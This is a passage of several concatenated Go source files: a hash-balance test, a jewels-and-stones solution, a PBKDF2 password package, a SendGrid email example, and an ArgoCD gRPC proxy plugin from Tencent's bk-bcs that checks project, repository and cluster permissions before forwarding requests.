// opened once per method and never closed), and failures use t.Fatalf
// instead of fmt.Println + os.Exit, which bypassed the test framework.
func TestBalance(t *testing.T) {
	for _, m := range methods {
		nodes := map[string]uint64{}
		file, err := os.Open(filePath)
		if err != nil {
			t.Fatalf("open %s: %v", filePath, err)
		}
		scanner := bufio.NewScanner(file)
		for scanner.Scan() {
			nodes[m.f(scanner.Text())]++
		}
		scanErr := scanner.Err()
		file.Close()
		if scanErr != nil {
			t.Fatalf("scan %s: %v", filePath, scanErr)
		}
		var total float64
		var counts []float64
		var empty int
		for _, v := range nodes {
			if v == 0 {
				empty++
			}
			vf := float64(v)
			total += vf
			counts = append(counts, vf)
		}
		sort.Float64s(counts)
		// Spread between the most- and least-loaded nodes.
		rng := counts[len(counts)-1] - counts[0]
		imbp := rng / total * 100
		imbr := counts[len(counts)-1] / counts[0]
		fmt.Printf("\n[%s]\n", m.name)
		fmt.Printf("%20s - %d\n", "Empty nodes", empty)
		fmt.Printf("%20s - portion of keys: %.2f%% / ratio: %.2fx\n",
			"Greatest imbalance", imbp, imbr)
		fmt.Printf("%20s - %.0f / highest value: %.0f / lowest value: %.0f\n",
			"Range", rng, counts[len(counts)-1], counts[0])
		// Per-node dump only for small clusters.
		if len(nodes) < 16 {
			fmt.Println()
			for _, n := range nodeList {
				fmt.Printf("%s: %d\n", n, nodes[n])
			}
		}
	}
}
|
package main
import (
"testing"
"github.com/stretchr/testify/assert"
)
// TestStart sanity-checks that an autoAir value can be constructed.
func TestStart(t *testing.T) {
	air := autoAir{}
	assert.NotNil(t, air)
}
|
package main
import "fmt"
// main runs numJewelsInStones on a tiny example and prints the result.
func main() {
	jewels := "z"
	stones := "ZZ"
	fmt.Printf("answer: %d", numJewelsInStones(jewels, stones))
}
// numJewelsInStones counts how many characters of S (stones) also
// appear in J (jewel types); the comparison is case-sensitive.
//
// Fix: the lookup `ok, _ := js[c]` named the map VALUE "ok" and
// discarded the actual presence flag — it only worked because the
// stored value happened to always be true. The set is now a
// map[rune]struct{} queried with the comma-ok form directly.
func numJewelsInStones(J string, S string) int {
	jewels := make(map[rune]struct{}, len(J))
	for _, c := range J {
		jewels[c] = struct{}{}
	}
	count := 0
	for _, c := range S {
		if _, ok := jewels[c]; ok {
			count++
		}
	}
	return count
}
|
package kafka
import metrics "github.com/rcrowley/go-metrics"
// init disables go-metrics collection package-wide: all metrics become
// cheap no-ops (nil metrics).
func init() {
	metrics.UseNilMetrics = true
}
|
package password
import (
"crypto/rand"
"crypto/sha256"
"fmt"
"io"
"strings"
"golang.org/x/crypto/pbkdf2"
)
// SecurePassword represents a one-way encrypted form of a password: the
// PBKDF2 hash plus the salt and iteration count needed to regenerate it
// when validating a candidate password. All fields are excluded from
// JSON serialization.
type SecurePassword struct {
	IterationCount int `json:"-"`
	Salt []byte `json:"-"`
	Hash []byte `json:"-"`
}

// Config carries the tunables used to generate a new SecurePassword.
type Config struct {
	saltSize, numIterations, hashLength int
}

// defaultConfig is the package-level configuration used by the
// top-level NewSecurePassword.
var defaultConfig = Config{
	saltSize: 16,
	numIterations: 2000,
	hashLength: 256,
}
// NewSecurePassword derives a SecurePassword from password using the
// package's default configuration.
func NewSecurePassword(password string) (SecurePassword, error) {
	return defaultConfig.NewSecurePassword(password)
}
// NewSecurePassword validates password, generates a random salt and
// derives the PBKDF2 hash according to the receiver's configuration.
func (c Config) NewSecurePassword(password string) (SecurePassword, error) {
	var secure SecurePassword
	// Reject empty or all-whitespace passwords up front.
	if strings.TrimSpace(password) == "" {
		return secure, fmt.Errorf("password is empty")
	}
	secure.IterationCount = c.numIterations
	salt, err := getSalt(c.saltSize)
	if err != nil {
		return secure, err
	}
	secure.Salt = salt
	secure.Hash = getHash(password, salt, secure.IterationCount, c.hashLength)
	return secure, nil
}
// ValidatePassword reports whether password, hashed with sp's salt and
// iteration count, reproduces sp's stored hash — i.e. whether the
// candidate password is correct.
func ValidatePassword(sp SecurePassword, password string) bool {
	newHash := getHash(password, sp.Salt, sp.IterationCount, len(sp.Hash))
	return areEqual(sp.Hash, newHash)
}
// GetHash is the exported wrapper around getHash: it derives a hash of
// hashLength bytes from password, salt and numIterations.
func GetHash(password string, salt []byte, numIterations int, hashLength int) []byte {
	return getHash(password, salt, numIterations, hashLength)
}
// getHash derives a hashLength-byte key from password and salt with
// PBKDF2-HMAC-SHA256 over numIterations rounds.
func getHash(password string, salt []byte, numIterations int, hashLength int) []byte {
	hash := pbkdf2.Key([]byte(password), salt, numIterations, hashLength, sha256.New)
	return hash
}
// GetSalt is the exported wrapper around getSalt: it returns size
// cryptographically random bytes.
func GetSalt(size int) ([]byte, error) {
	return getSalt(size)
}
// getSalt returns size cryptographically random bytes from the system
// entropy source, or an error for a non-positive size or a short read.
func getSalt(size int) ([]byte, error) {
	if size < 1 {
		return nil, fmt.Errorf("invalid salt size %d", size)
	}
	salt := make([]byte, size)
	n, err := io.ReadFull(rand.Reader, salt)
	switch {
	case err != nil:
		return nil, err
	case n != size:
		return nil, fmt.Errorf("number of bytes read %d are not the same as expected size of salt %d", n, size)
	}
	return salt, nil
}
// areEqual reports whether two hashes are identical.
//
// Fix: the comparison is now constant-time with respect to contents —
// it accumulates the XOR of every byte pair instead of returning at
// the first mismatch, so password validation does not leak the
// position of the first differing byte through timing. Lengths are
// still compared directly; hash lengths are not secret here.
func areEqual(h1, h2 []byte) bool {
	if len(h1) != len(h2) {
		return false
	}
	var diff byte
	for i := range h1 {
		diff |= h1[i] ^ h2[i]
	}
	return diff == 0
}
|
package main
import (
"fmt"
"os"
"github.com/sendgrid/sendgrid-go"
)
// main sends a single test email through SendGrid using credentials
// from the SENDGRID_USERNAME / SENDGRID_PASSWORD environment variables.
func main() {
	client := sendgrid.NewSendGridClient(os.Getenv("SENDGRID_USERNAME"), os.Getenv("SENDGRID_PASSWORD"))
	msg := sendgrid.NewMail()
	msg.AddTo("eddiezane@sendgrid.com")
	msg.AddToName("Eddie Zaneski")
	msg.AddSubject("SendGrid Testing")
	msg.AddText("WIN")
	msg.AddFrom("eddiezane@sendgrid.com")
	if err := client.Send(msg); err == nil {
		fmt.Println("Email sent!")
	} else {
		fmt.Println(err)
	}
}
|
/*
* Tencent is pleased to support the open source community by making Blueking Container Service available.
* Copyright (C) 2019 THL A29 Limited, a Tencent company. All rights reserved.
* Licensed under the MIT License (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
* http://opensource.org/licenses/MIT
* Unless required by applicable law or agreed to in writing, software distributed under
* the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
* either express or implied. See the License for the specific language governing permissions and
* limitations under the License.
*/
package argocd
import (
"bytes"
"context"
"encoding/binary"
"fmt"
"io"
"net/http"
"strconv"
"strings"
"github.com/argoproj/argo-cd/v2/pkg/apiclient/application"
"github.com/argoproj/argo-cd/v2/pkg/apiclient/applicationset"
"github.com/argoproj/argo-cd/v2/pkg/apiclient/cluster"
"github.com/argoproj/argo-cd/v2/pkg/apiclient/project"
argorepo "github.com/argoproj/argo-cd/v2/pkg/apiclient/repository"
"github.com/argoproj/argo-cd/v2/pkg/apis/application/v1alpha1"
"github.com/gorilla/mux"
"github.com/pkg/errors"
"google.golang.org/grpc/encoding"
"google.golang.org/grpc/encoding/proto"
"github.com/Tencent/bk-bcs/bcs-common/common/blog"
"github.com/Tencent/bk-bcs/bcs-common/pkg/auth/iam"
"github.com/Tencent/bk-bcs/bcs-scenarios/bcs-gitops-manager/pkg/common"
"github.com/Tencent/bk-bcs/bcs-scenarios/bcs-gitops-manager/pkg/proxy"
mw "github.com/Tencent/bk-bcs/bcs-scenarios/bcs-gitops-manager/pkg/proxy/argocd/middleware"
)
// argoGrpcHandler handles one grpc-gateway route and produces the HTTP
// response to proxy back.
type argoGrpcHandler func(ctx context.Context, req *http.Request) *mw.HttpResponse

var (
	// grpcAccessUrlHandlers maps the admitted gRPC API paths to their
	// handlers (populated in Init). NOTE(review): some entries are nil;
	// serve invokes the handler unconditionally, which would panic for
	// those paths — confirm intended behavior.
	grpcAccessUrlHandlers map[string]argoGrpcHandler
)

// GrpcPlugin routes grpc-gateway requests for internal project
// authorization.
type GrpcPlugin struct {
	*mux.Router
	middleware mw.MiddlewareInterface
}
// Init registers the admitted gRPC routes and installs the wrapped
// serve handler on the plugin's router.
// See: github.com/argoproj/argocd/v2/cmd/argocd/commands
func (plugin *GrpcPlugin) Init() error {
	grpcAccessUrlHandlers = map[string]argoGrpcHandler{
		"/project.ProjectService/List":               plugin.handleProjectList,
		"/project.ProjectService/GetDetailedProject": plugin.handleProjectGet,
		"/project.ProjectService/Get":                plugin.handleProjectGet,
		"/repository.RepositoryService/ListRepositories": plugin.handleRepoList,
		"/repository.RepositoryService/Get":              plugin.handleRepoGet,
		"/repository.RepositoryService/ValidateAccess":   plugin.handleRepoAccess,
		"/repository.RepositoryService/CreateRepository": plugin.handleRepoCreate,
		"/repository.RepositoryService/DeleteRepository": plugin.handleRepoDelete,
		// NOTE(review): nil entries are admitted but have no handler —
		// serve would panic invoking them; confirm how these are meant
		// to be processed.
		"/repository.RepositoryService/ListRefs":      nil,
		"/repository.RepositoryService/ListApps":      nil,
		"/repository.RepositoryService/GetAppDetails": nil,
		"/repository.RepositoryService/GetHelmCharts": nil,
		"/cluster.ClusterService/List":  plugin.handleClusterList,
		"/cluster.SettingsService/Get":  plugin.handleClusterSettingGet,
		"/cluster.ClusterService/Get":   plugin.handleClusterGet,
		"/application.ApplicationService/List":       plugin.handleAppList,
		"/application.ApplicationService/Get":        plugin.handleAppGet,
		"/application.ApplicationService/Create":     plugin.handleAppCreate,
		"/application.ApplicationService/Sync":       plugin.handleAppSync,
		"/application.ApplicationService/Watch":      plugin.handleAppWatch,
		"/application.ApplicationService/Delete":     plugin.handleAppDelete,
		"/application.ApplicationService/Update":     plugin.handleAppUpdate,
		"/application.ApplicationService/UpdateSpec": plugin.handleAppUpdateSpec,
		"/application.ApplicationService/Patch":      plugin.handleAppPatch,
		"/application.ApplicationService/ListResourceEvents":        plugin.handleAppListResourceEvents,
		"/application.ApplicationService/GetApplicationSyncWindows": plugin.handleAppGetApplicationSyncWindows,
		"/application.ApplicationService/RevisionMetadata":          plugin.handleAppRevisionMetadata,
		"/application.ApplicationService/GetManifests":              plugin.handleAppGetManifests,
		"/application.ApplicationService/ManagedResources":          plugin.handleAppManagedResources,
		"/application.ApplicationService/ResourceTree":              plugin.handleAppResourceTree,
		"/application.ApplicationService/Rollback":                  plugin.handleAppRollback,
		"/application.ApplicationService/TerminateOperation":        plugin.handleAppTerminateOperation,
		"/application.ApplicationService/GetResource":               plugin.handleAppGetResource,
		"/application.ApplicationService/PatchResource":             plugin.handleAppPatchResource,
		"/application.ApplicationService/ListResourceActions":       plugin.handleAppListResourceActions,
		"/application.ApplicationService/RunResourceAction":         plugin.handleAppRunResourceAction,
		"/application.ApplicationService/DeleteResource":            plugin.handleAppDeleteResource,
		"/application.ApplicationService/PodLogs":                   plugin.handleAppPodLogs,
		"/application.ApplicationService/ListLinks":                 plugin.handleAppListLinks,
		"/application.ApplicationService/ListResourceLinks":         plugin.handleAppListResourceLinks,
		"/applicationset.ApplicationSetService/List":   plugin.handleAppSetList,
		"/applicationset.ApplicationSetService/Get":    plugin.handleAppSetGet,
		"/applicationset.ApplicationSetService/Create": plugin.handleAppSetCreate,
		"/applicationset.ApplicationSetService/Delete": plugin.handleAppSetDelete,
	}
	plugin.Path("").Handler(plugin.middleware.HttpWrapper(plugin.serve))
	return nil
}
// serve dispatches admin-only gRPC requests to the handler registered for the
// request path; non-admin callers and unregistered paths get 403.
func (plugin *GrpcPlugin) serve(ctx context.Context, req *http.Request) *mw.HttpResponse {
	if !proxy.IsAdmin(req) {
		return mw.ReturnGRPCErrorResponse(http.StatusForbidden, fmt.Errorf("request not come from admin"))
	}
	handler, ok := grpcAccessUrlHandlers[strings.TrimPrefix(req.URL.Path, common.GitOpsProxyURL)]
	if !ok {
		// Fixed client-visible typo: "unahtourized" -> "unauthorized".
		return mw.ReturnGRPCErrorResponse(http.StatusForbidden, fmt.Errorf("request url '%s' unauthorized", req.URL.Path))
	}
	return handler(ctx, req)
}
// parseRequestBytes unwraps a gRPC-framed message: the first 5 bytes are the
// header — byte 0 is the compression flag, bytes 1-4 the big-endian body
// length. It returns the message body.
func (plugin *GrpcPlugin) parseRequestBytes(request []byte) ([]byte, error) {
	if len(request) < 5 {
		return nil, fmt.Errorf("request body %v bytes not over 5", request)
	}
	// NOTE: bodies are assumed uncompressed; the flag byte is ignored.
	_ = request[0]
	bodyLen := binary.BigEndian.Uint32(request[1:5])
	// Compare in uint64 so an adversarially large length prefix cannot wrap
	// around (the original uint32 `bodyLen+5` could overflow).
	if uint64(len(request)) < uint64(bodyLen)+5 {
		return nil, fmt.Errorf("request body %v not normal", request)
	}
	return request[5 : uint64(bodyLen)+5], nil
}
// readRequestBody reads the full request body, restores it on req so the
// request can still be proxied downstream, then decodes the gRPC-framed
// payload into query via the proto codec.
func (plugin *GrpcPlugin) readRequestBody(ctx context.Context, req *http.Request, query interface{}) error {
	raw, err := io.ReadAll(req.Body)
	if err != nil {
		return errors.Wrapf(err, "read request body failed")
	}
	// Put the bytes back for the downstream reverse proxy.
	req.Body = io.NopCloser(bytes.NewBuffer(raw))
	payload, err := plugin.parseRequestBytes(raw)
	if err != nil {
		return errors.Wrapf(err, "parse request body failed")
	}
	if err = encoding.GetCodec(proto.Name).Unmarshal(payload, query); err != nil {
		return errors.Wrapf(err, "unmarshal request body failed")
	}
	return nil
}
// rewriteRequestBody re-frames body as a gRPC message (1-byte compression
// flag, 4-byte big-endian length, payload) and installs it as req.Body,
// returning the total framed length so the caller can fix Content-Length.
func (plugin *GrpcPlugin) rewriteRequestBody(req *http.Request, body interface{}) (int, error) {
	payload, err := encoding.GetCodec(proto.Name).Marshal(body)
	if err != nil {
		return 0, errors.Wrapf(err, "encoding request body failed")
	}
	framed := make([]byte, 5, 5+len(payload))
	framed[0] = 0 // uncompressed
	binary.BigEndian.PutUint32(framed[1:5], uint32(len(payload)))
	framed = append(framed, payload...)
	req.Body = io.NopCloser(bytes.NewBuffer(framed))
	return len(framed), nil
}
// handleProjectList will handle the grpc request of list project
func (plugin *GrpcPlugin) handleProjectList(ctx context.Context, req *http.Request) *mw.HttpResponse {
	projects, statusCode, err := plugin.middleware.ListProjects(ctx)
	if statusCode == http.StatusOK {
		return mw.ReturnGRPCResponse(projects)
	}
	return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "list projects failed"))
}
// handleProjectGet will return project details by project name
func (plugin *GrpcPlugin) handleProjectGet(ctx context.Context, req *http.Request) *mw.HttpResponse {
	projQuery := &project.ProjectQuery{}
	if err := plugin.readRequestBody(ctx, req, projQuery); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	_, statusCode, err := plugin.middleware.CheckProjectPermission(ctx, projQuery.Name, iam.ProjectView)
	if statusCode != http.StatusOK {
		return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "check project '%s' view permission failed", projQuery.Name))
	}
	// nil lets the middleware fall through to the upstream handler.
	return nil
}
// handleRepoList will return repo list
func (plugin *GrpcPlugin) handleRepoList(ctx context.Context, req *http.Request) *mw.HttpResponse {
	projects, statusCode, err := plugin.middleware.ListProjects(ctx)
	if statusCode != http.StatusOK {
		return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "list projects failed"))
	}
	// Restrict repositories to projects the caller can see.
	projectNames := make([]string, 0, len(projects.Items))
	for i := range projects.Items {
		projectNames = append(projectNames, projects.Items[i].Name)
	}
	repoList, statusCode, err := plugin.middleware.ListRepositories(ctx, projectNames, false)
	if statusCode != http.StatusOK {
		return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "list repositories failed"))
	}
	return mw.ReturnGRPCResponse(repoList)
}
// handleRepoGet will return repo details by repo name
func (plugin *GrpcPlugin) handleRepoGet(ctx context.Context, req *http.Request) *mw.HttpResponse {
	query := &argorepo.RepoQuery{}
	if err := plugin.readRequestBody(ctx, req, query); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	repo, statusCode, err := plugin.middleware.CheckRepositoryPermission(ctx, query.Repo, iam.ProjectView)
	// Check the status code rather than err alone, matching every sibling
	// handler: a non-OK status with a nil err must not leak the repo.
	if statusCode != http.StatusOK {
		return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "check repo '%s' permission failed", query.Repo))
	}
	return mw.ReturnGRPCResponse(repo)
}
// handleRepoAccess will check repo access
func (plugin *GrpcPlugin) handleRepoAccess(ctx context.Context, req *http.Request) *mw.HttpResponse {
	accessQuery := new(argorepo.RepoAccessQuery)
	if err := plugin.readRequestBody(ctx, req, accessQuery); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	if accessQuery.Project == "" {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("create repo request project cannot empty"))
	}
	_, statusCode, err := plugin.middleware.CheckProjectPermission(ctx, accessQuery.Project, iam.ProjectEdit)
	if statusCode != http.StatusOK {
		return mw.ReturnGRPCErrorResponse(statusCode,
			errors.Wrapf(err, "check project '%s' edit permission failed", accessQuery.Project))
	}
	return nil
}
// handleRepoCreate will create repo to argocd
func (plugin *GrpcPlugin) handleRepoCreate(ctx context.Context, req *http.Request) *mw.HttpResponse {
	repoCreate := &argorepo.RepoCreateRequest{}
	if err := plugin.readRequestBody(ctx, req, repoCreate); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	if repoCreate.Repo == nil || repoCreate.Repo.Project == "" {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("create repo request project cannot empty"))
	}
	// NOTE(review): repo creation is a mutation but only ProjectView is
	// required here, while handleRepoAccess demands ProjectEdit — confirm the
	// intended action ID. The error message now matches the actual check.
	_, statusCode, err := plugin.middleware.CheckProjectPermission(ctx, repoCreate.Repo.Project, iam.ProjectView)
	if statusCode != http.StatusOK {
		return mw.ReturnGRPCErrorResponse(statusCode,
			errors.Wrapf(err, "check project '%s' view permission failed", repoCreate.Repo.Project))
	}
	return nil
}
// handleRepoDelete will delete repo from argocd
func (plugin *GrpcPlugin) handleRepoDelete(ctx context.Context, req *http.Request) *mw.HttpResponse {
	delQuery := new(argorepo.RepoQuery)
	if err := plugin.readRequestBody(ctx, req, delQuery); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	if delQuery.Repo == "" {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("delete repo request repo cannot empty"))
	}
	_, statusCode, err := plugin.middleware.CheckRepositoryPermission(ctx, delQuery.Repo, iam.ProjectView)
	if statusCode != http.StatusOK {
		return mw.ReturnGRPCErrorResponse(statusCode,
			errors.Wrapf(err, "check repo '%s' permission failed", delQuery.Repo))
	}
	return nil
}
// handleRepoListRefs will list repo refs from argocd
func (plugin *GrpcPlugin) handleRepoListRefs(ctx context.Context, req *http.Request) *mw.HttpResponse {
	query := &argorepo.RepoQuery{}
	if err := plugin.readRequestBody(ctx, req, query); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	if query.Repo == "" {
		// Fixed copy-pasted message that referred to "delete repo".
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("list repo refs request repo cannot empty"))
	}
	_, statusCode, err := plugin.middleware.CheckRepositoryPermission(ctx, query.Repo, iam.ProjectView)
	if statusCode != http.StatusOK {
		return mw.ReturnGRPCErrorResponse(statusCode,
			errors.Wrapf(err, "check repo '%s' permission failed", query.Repo))
	}
	return nil
}
// handleRepoListApps will handle repo list apps
func (plugin *GrpcPlugin) handleRepoListApps(ctx context.Context, req *http.Request) *mw.HttpResponse {
	query := &argorepo.RepoAppsQuery{}
	if err := plugin.readRequestBody(ctx, req, query); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	if query.Repo == "" {
		// Fixed copy-pasted message that referred to "delete repo".
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("list repo apps request repo cannot empty"))
	}
	_, statusCode, err := plugin.middleware.CheckRepositoryPermission(ctx, query.Repo, iam.ProjectView)
	if statusCode != http.StatusOK {
		return mw.ReturnGRPCErrorResponse(statusCode,
			errors.Wrapf(err, "check repo '%s' permission failed", query.Repo))
	}
	return nil
}
// handleRepoGetAppDetails will handle repo get application details
func (plugin *GrpcPlugin) handleRepoGetAppDetails(ctx context.Context, req *http.Request) *mw.HttpResponse {
	query := &argorepo.RepoAppDetailsQuery{}
	if err := plugin.readRequestBody(ctx, req, query); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	// Source is an optional proto pointer: guard it before dereferencing to
	// avoid a panic on an empty body; message also fixed (was copy-pasted
	// from the delete handler).
	if query.Source == nil || query.Source.RepoURL == "" {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("get app details request repo cannot empty"))
	}
	_, statusCode, err := plugin.middleware.CheckRepositoryPermission(ctx, query.Source.RepoURL, iam.ProjectView)
	if statusCode != http.StatusOK {
		return mw.ReturnGRPCErrorResponse(statusCode,
			errors.Wrapf(err, "check repo '%s' permission failed", query.Source.RepoURL))
	}
	return nil
}
// handleRepoGetHelmCharts will handle repo get helm charts
func (plugin *GrpcPlugin) handleRepoGetHelmCharts(ctx context.Context, req *http.Request) *mw.HttpResponse {
	query := &argorepo.RepoQuery{}
	if err := plugin.readRequestBody(ctx, req, query); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	if query.Repo == "" {
		// Fixed copy-pasted message that referred to "delete repo".
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("get helm charts request repo cannot empty"))
	}
	_, statusCode, err := plugin.middleware.CheckRepositoryPermission(ctx, query.Repo, iam.ProjectView)
	if statusCode != http.StatusOK {
		return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "check repo '%s' permission failed", query.Repo))
	}
	return nil
}
// handleClusterList will handle cluster list
func (plugin *GrpcPlugin) handleClusterList(ctx context.Context, req *http.Request) *mw.HttpResponse {
	projects, statusCode, err := plugin.middleware.ListProjects(ctx)
	if statusCode != http.StatusOK {
		return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "list projects failed"))
	}
	// Only clusters belonging to the caller's visible projects are listed.
	projectNames := make([]string, 0, len(projects.Items))
	for i := range projects.Items {
		projectNames = append(projectNames, projects.Items[i].Name)
	}
	blog.Infof("RequestID[%s] list cluster with projects: %v", mw.RequestID(ctx), projectNames)
	clusters, statusCode, err := plugin.middleware.ListClusters(ctx, projectNames)
	if statusCode != http.StatusOK {
		return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "list clusters failed"))
	}
	return mw.ReturnGRPCResponse(clusters)
}
// parseClusterName will parse cluster name and check it
func (plugin *GrpcPlugin) parseClusterName(server string) (string, error) {
	segments := strings.Split(server, "/")
	candidate := segments[len(segments)-1]
	if strings.HasPrefix(candidate, "BCS-K8S-") {
		return candidate, nil
	}
	return "", errors.Errorf("parse cluster '%s' failed", server)
}
// handleClusterGet will handle cluster get, return cluster details
func (plugin *GrpcPlugin) handleClusterGet(ctx context.Context, req *http.Request) *mw.HttpResponse {
	query := &cluster.ClusterQuery{}
	if err := plugin.readRequestBody(ctx, req, query); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	statusCode, err := plugin.middleware.CheckClusterPermission(ctx, query, iam.ClusterView)
	// Treat any non-OK status as failure (consistent with the other handlers)
	// and report "cluster" — the original message said "application".
	if statusCode != http.StatusOK {
		return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "check cluster '%s' permission failed", query.Name))
	}
	return nil
}
// handleClusterSettingGet performs no permission check; returning nil lets
// the request fall through to the upstream handler unchanged.
func (plugin *GrpcPlugin) handleClusterSettingGet(ctx context.Context, req *http.Request) *mw.HttpResponse {
	return nil
}
// handleAppSetList will handle applicationSet list, return applicationSets
func (plugin *GrpcPlugin) handleAppSetList(ctx context.Context, req *http.Request) *mw.HttpResponse {
	projectList, statusCode, err := plugin.middleware.ListProjects(ctx)
	if statusCode != http.StatusOK {
		return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "list projects failed"))
	}
	query := new(applicationset.ApplicationSetListQuery)
	if err := plugin.readRequestBody(ctx, req, query); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	// Visible projects, optionally narrowed to those named in the query.
	names := make([]string, 0, len(projectList.Items))
	if len(query.Projects) != 0 {
		queryProjects := make(map[string]struct{}, len(query.Projects))
		for _, pro := range query.Projects {
			queryProjects[pro] = struct{}{}
		}
		for i := range projectList.Items {
			if _, ok := queryProjects[projectList.Items[i].Name]; ok {
				names = append(names, projectList.Items[i].Name)
			}
		}
	} else {
		for i := range projectList.Items {
			names = append(names, projectList.Items[i].Name)
		}
	}
	appsetList, err := plugin.middleware.ListApplicationSets(ctx, names)
	if err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusInternalServerError,
			errors.Wrapf(err, "list applicationsets by project '%s' from storage failed", names))
	}
	// Unlike handleAppList there is no per-item filtering here, so the former
	// element-by-element copy of appsetList.Items was a no-op and is removed.
	return mw.ReturnGRPCResponse(appsetList)
}
// handleAppSetGet handle application get, return application details
func (plugin *GrpcPlugin) handleAppSetGet(ctx context.Context, req *http.Request) *mw.HttpResponse {
	getQuery := new(applicationset.ApplicationSetGetQuery)
	if err := plugin.readRequestBody(ctx, req, getQuery); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	if statusCode, err := plugin.middleware.CheckGetApplicationSet(ctx, getQuery.Name); err != nil {
		return mw.ReturnGRPCErrorResponse(statusCode,
			errors.Wrapf(err, "check applicationset '%s' failed", getQuery.Name))
	}
	return mw.ReturnArgoReverse()
}
// handleAppSetCreate handle application create
func (plugin *GrpcPlugin) handleAppSetCreate(ctx context.Context, req *http.Request) *mw.HttpResponse {
	createReq := new(applicationset.ApplicationSetCreateRequest)
	if err := plugin.readRequestBody(ctx, req, createReq); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	if statusCode, err := plugin.middleware.CheckCreateApplicationSet(ctx, createReq.Applicationset); err != nil {
		return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "check create applicationset failed"))
	}
	// Re-encode the parsed body back onto the request so the proxied call
	// sees a consistent gRPC frame, then fix the length headers.
	newLen, err := plugin.rewriteRequestBody(req, createReq)
	if err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, errors.Wrapf(err, "rewrite request body failed"))
	}
	req.Header.Set("Content-Length", strconv.Itoa(newLen))
	req.ContentLength = int64(newLen)
	return mw.ReturnArgoReverse()
}
// handleAppSetDelete will handle application delete
func (plugin *GrpcPlugin) handleAppSetDelete(ctx context.Context, req *http.Request) *mw.HttpResponse {
	delReq := new(applicationset.ApplicationSetDeleteRequest)
	if err := plugin.readRequestBody(ctx, req, delReq); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	if statusCode, err := plugin.middleware.CheckDeleteApplicationSet(ctx, delReq.Name); err != nil {
		return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "check delete applicationset failed"))
	}
	return mw.ReturnArgoReverse()
}
// handleAppList will handle application list, return applications
func (plugin *GrpcPlugin) handleAppList(ctx context.Context, req *http.Request) *mw.HttpResponse {
	projectList, statusCode, err := plugin.middleware.ListProjects(ctx)
	if statusCode != http.StatusOK {
		return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "list projects failed"))
	}
	query := new(application.ApplicationQuery)
	if err := plugin.readRequestBody(ctx, req, query); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	// Visible projects, optionally narrowed to those named in the query.
	names := make([]string, 0, len(projectList.Items))
	if len(query.Projects) == 0 {
		for i := range projectList.Items {
			names = append(names, projectList.Items[i].Name)
		}
	} else {
		wanted := make(map[string]struct{}, len(query.Projects))
		for _, pro := range query.Projects {
			wanted[pro] = struct{}{}
		}
		for i := range projectList.Items {
			if _, ok := wanted[projectList.Items[i].Name]; ok {
				names = append(names, projectList.Items[i].Name)
			}
		}
	}
	appList, err := plugin.middleware.ListApplications(ctx, names)
	if err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusInternalServerError,
			errors.Wrapf(err, "list applications by project '%s' from storage failed", names))
	}
	// Apply the optional name/repo/namespace filters from the query.
	result := make([]v1alpha1.Application, 0, len(appList.Items))
	for i := range appList.Items {
		item := appList.Items[i]
		if query.Name != nil && (*query.Name != "" && *query.Name != item.Name) {
			continue
		}
		if query.Repo != nil && (*query.Repo != "" && *query.Repo != item.Spec.Source.RepoURL) {
			continue
		}
		if query.AppNamespace != nil && (*query.AppNamespace != "" && *query.AppNamespace !=
			item.Spec.Destination.Namespace) {
			continue
		}
		result = append(result, item)
	}
	appList.Items = result
	return mw.ReturnGRPCResponse(appList)
}
// handleAppGet handle application get, return application details
func (plugin *GrpcPlugin) handleAppGet(ctx context.Context, req *http.Request) *mw.HttpResponse {
	query := &application.ApplicationQuery{}
	if err := plugin.readRequestBody(ctx, req, query); err != nil {
		return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
	}
	// Name is an optional proto pointer; an empty body would otherwise panic
	// on the dereference below.
	if query.Name == nil {
